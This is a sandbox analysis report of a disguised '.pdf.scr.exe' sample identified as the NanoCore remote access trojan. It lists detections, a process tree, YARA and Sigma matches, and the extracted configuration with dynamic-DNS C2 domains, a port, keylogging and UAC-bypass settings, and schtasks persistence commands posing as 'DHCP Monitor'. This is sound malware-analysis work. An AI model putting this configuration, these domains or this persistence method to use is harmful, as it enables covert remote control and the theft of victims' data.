Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
026910003102350.pdf.scr.exe

Overview

General Information

Sample Name:026910003102350.pdf.scr.exe
Analysis ID:796783
MD5:c2a80ccf6362bba805072de9ce963ea5
SHA1:c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
SHA256:592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
Tags:exe
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • 026910003102350.pdf.scr.exe (PID: 4980 cmdline: C:\Users\user\Desktop\026910003102350.pdf.scr.exe MD5: C2A80CCF6362BBA805072DE9CE963EA5)
    • wscript.exe (PID: 2312 cmdline: "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • itugx.exe (PID: 5920 cmdline: "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
        • RegSvcs.exe (PID: 5960 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
          • schtasks.exe (PID: 4544 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 2216 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • itugx.exe (PID: 3300 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 4736 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • RegSvcs.exe (PID: 5072 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 2960 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 2896 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 4036 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 3624 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 576 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • itugx.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 5508 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 4776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 5736 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • itugx.exe (PID: 5552 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 3928 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 5776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 1712 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 4764 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
  • 0x1104d:$x1: NanoCore.ClientPluginHost
  • 0x1108a:$x2: IClientNetworkHost
  • 0x14bbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x10db5:$a: NanoCore
    • 0x10dc5:$a: NanoCore
    • 0x10ff9:$a: NanoCore
    • 0x1100d:$a: NanoCore
    • 0x1104d:$a: NanoCore
    • 0x10e14:$b: ClientPlugin
    • 0x11016:$b: ClientPlugin
    • 0x11056:$b: ClientPlugin
    • 0x10f3b:$c: ProjectData
    • 0x11942:$d: DESCrypto
    • 0x1930e:$e: KeepAlive
    • 0x172fc:$g: LogClientMessage
    • 0x134f7:$i: get_Connected
    • 0x11c78:$j: #=q
    • 0x11ca8:$j: #=q
    • 0x11cc4:$j: #=q
    • 0x11cf4:$j: #=q
    • 0x11d10:$j: #=q
    • 0x11d2c:$j: #=q
    • 0x11d5c:$j: #=q
    • 0x11d78:$j: #=q
    00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
    • 0x1104d:$a1: NanoCore.ClientPluginHost
    • 0x1100d:$a2: NanoCore.ClientPlugin
    • 0x12f66:$b1: get_BuilderSettings
    • 0x10e69:$b2: ClientLoaderForm.resources
    • 0x12686:$b3: PluginCommand
    • 0x1103e:$b4: IClientAppHost
    • 0x1b4be:$b5: GetBlockHash
    • 0x135be:$b6: AddHostEntry
    • 0x172b1:$b7: LogClientException
    • 0x1352b:$b8: PipeExists
    • 0x11077:$b9: IClientLoggingHost
    00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x103bd:$x1: NanoCore.ClientPluginHost
    • 0x103fa:$x2: IClientNetworkHost
    • 0x13f2d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 247 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    28.3.itugx.exe.146edb8.0.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth (Nextron Systems)
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    28.3.itugx.exe.146edb8.0.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth (Nextron Systems)
    • 0xff05:$x1: NanoCore Client.exe
    • 0x1018d:$x2: NanoCore.ClientPluginHost
    • 0x117c6:$s1: PluginCommand
    • 0x117ba:$s2: FileCommand
    • 0x1266b:$s3: PipeExists
    • 0x18422:$s4: PipeCreated
    • 0x101b7:$s5: IClientLoggingHost
    28.3.itugx.exe.146edb8.0.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      28.3.itugx.exe.146edb8.0.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
      • 0xfef5:$x1: NanoCore Client
      • 0xff05:$x1: NanoCore Client
      • 0x1014d:$x2: NanoCore.ClientPlugin
      • 0x1018d:$x3: NanoCore.ClientPluginHost
      • 0x10142:$i1: IClientApp
      • 0x10163:$i2: IClientData
      • 0x1016f:$i3: IClientNetwork
      • 0x1017e:$i4: IClientAppHost
      • 0x101a7:$i5: IClientDataHost
      • 0x101b7:$i6: IClientLoggingHost
      • 0x101ca:$i7: IClientNetworkHost
      • 0x101dd:$i8: IClientUIHost
      • 0x101eb:$i9: IClientNameObjectCollection
      • 0x10207:$i10: IClientReadOnlyNameObjectCollection
      • 0xff54:$s1: ClientPlugin
      • 0x10156:$s1: ClientPlugin
      • 0x1064a:$s2: EndPoint
      • 0x10653:$s3: IPAddress
      • 0x1065d:$s4: IPEndPoint
      • 0x12093:$s6: get_ClientSettings
      • 0x12637:$s7: get_Connected
      28.3.itugx.exe.146edb8.0.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfef5:$a: NanoCore
      • 0xff05:$a: NanoCore
      • 0x10139:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0x1018d:$a: NanoCore
      • 0xff54:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x10196:$b: ClientPlugin
      • 0x1007b:$c: ProjectData
      • 0x10a82:$d: DESCrypto
      • 0x1844e:$e: KeepAlive
      • 0x1643c:$g: LogClientMessage
      • 0x12637:$i: get_Connected
      • 0x10db8:$j: #=q
      • 0x10de8:$j: #=q
      • 0x10e04:$j: #=q
      • 0x10e34:$j: #=q
      • 0x10e50:$j: #=q
      • 0x10e6c:$j: #=q
      • 0x10e9c:$j: #=q
      • 0x10eb8:$j: #=q
      Click to see the 362 entries

      Sigma Signatures

      AV Detection

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Persistence and Installation Behavior

      barindex
      Sigma detected: Scheduled temp file as task from temp location
      Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentProcessId: 5960, ParentProcessName: RegSvcs.exe, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, ProcessId: 4544, ProcessName: schtasks.exe

      Stealing of Sensitive Information

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: december2n.duckdns.orgAvira URL Cloud: Label: malware
      Source: december2nd.ddns.netAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeAvira: detection malicious, Label: DR/AutoIt.Gen
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
